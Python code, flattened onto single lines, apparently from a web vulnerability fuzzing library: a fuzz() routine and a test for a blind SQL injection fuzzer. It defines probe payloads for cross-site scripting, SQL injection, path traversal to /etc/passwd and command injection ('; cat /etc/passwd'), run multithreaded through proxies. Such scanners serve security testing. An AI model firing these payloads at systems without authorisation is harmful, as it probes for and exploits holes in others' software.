def fuzz(targets): xss_payload = Payload('"><ScRipT>alert(31337)</ScrIpT>', check_type_list = ["xss"]) sqli_xpathi_payload = Payload("')--#", check_type_list = ["sqli", "xpathi"]) trav_payload = Payload('../../../../../../../../../../../../../../../../../../../../../../../etc/passwd', check_type_list = ["trav"]) xpathi_payload = Payload('<!--', check_type_list = ["xpathi"]) osci_payload = Payload('; cat /etc/passwd') wf = WebFuzzer(targets, num_threads=25, time_per_url=5, request_timeout=4, proxy_list=proxy_scan_list, hadoop_reporting=True) wf.add_payload(xss_payload) wf.add_payload(sqli_xpathi_payload) wf.add_payload(trav_payload) wf.add_payload(xpathi_payload) wf.add_payload(osci_payload) wf.generate_fuzzy_targets() wf_results = wf.fuzz() generic_true_payload = BSQLIPayload(" AND 1=1", {"truth": True}) generic_false_payload = BSQLIPayload(" AND 1=2", {"truth": False}) generic_payload_group = BSQLIPayloadGroup(generic_true_payload, generic_false_payload) dump_true_payload = BSQLIPayload(" OR 1=1", {"truth": True}) dump_false_payload = BSQLIPayload(" OR 1=2", {"truth": False}) dump_payload_group = BSQLIPayloadGroup(dump_true_payload, dump_false_payload) payload_groups = [generic_payload_group, dump_payload_group] bf = BSQLiFuzzer(targets, bsqli_payload_groups=payload_groups, hadoop_reporting=True, num_threads=10) bf_results = bf.fuzz() for result in wf_results: yield result for result in bf_results: yield result
def test_bsqlifuzzer(self): # Create true and false conditions using AND generic_true_payload = BSQLIPayload(" AND 1=1", {"truth" : True}) generic_false_payload = BSQLIPayload(" AND 1=2", {"truth" : False}) # Create PayloadGroup generic_payload_group = BSQLIPayloadGroup(generic_true_payload, generic_false_payload) # This second group is for checking the returned content length # Create true and false conditions using OR dump_true_payload = BSQLIPayload(" OR 1=1", {"truth" : True}) dump_false_payload = BSQLIPayload(" OR 1=2", {"truth" : False}) dump_payload_group = BSQLIPayloadGroup(dump_true_payload, dump_false_payload) payload_groups = [generic_payload_group, dump_payload_group] bf = BSQLiFuzzer(targets, bsqli_payload_groups = payload_groups, hadoop_reporting=False, num_threads=10) result = bf.fuzz()